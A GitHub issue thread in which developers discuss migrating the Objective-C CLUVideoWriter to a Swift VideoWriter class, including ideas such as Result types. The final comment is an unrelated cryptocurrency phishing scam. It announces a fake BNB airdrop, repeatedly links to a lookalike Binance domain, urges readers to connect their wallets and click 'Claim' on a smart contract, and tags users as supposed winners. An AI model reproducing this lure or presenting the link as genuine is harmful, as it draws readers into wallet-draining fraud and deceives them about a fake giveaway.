### ISSUE TITLE
Create VideoWriter for writing video files

### ISSUE THREAD

**Issue by andrea-prearo** [Geek-1001/Clue#11]
**Description**

Right now, we are using `CLUVideoWriter` to write video content to file. We'd like to create a specific writer for video content (`VideoWriter`) to better encapsulate this functionality.

**Comment by Geek-1001** [comment]
Do you mean migrate `CLUVideoWriter` to Swift and create `VideoWriter`, right? 🙂 
I think the encapsulation in `CLUVideoWriter` is fine (could be better but still). 
We need to migrate it to Swift, that's for sure.

Let me take this one. I'll recreate `VideoWriter` in Swift and replace it wherever it needs to be replaced so we can continue with our migration further. And we'll discuss everything in a pull-request.
What do you think?

**Comment by andrea-prearo** [comment]
Yes, this issue is about migrating `CLUVideoWriter` to Swift by creating a `VideoWriter` class. 👍 

The note about the encapsulation is more of a reminder about looking for possible improvements. As we are migrating to Swift, there may be situations where we could improve on the original Objective C implementation/design by taking advantage of better abstractions only available with Swift. For instance, using `Result<T, ErrorType>` instead of the original `NSError**`, or storing an error as a public read-only property, could be one of those situations.

**Comment by Renyu106** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @Hades-li, @Ac2zoom, @michaljanocko, @degule, @smitto, @guille2718, @JeffreyBodin
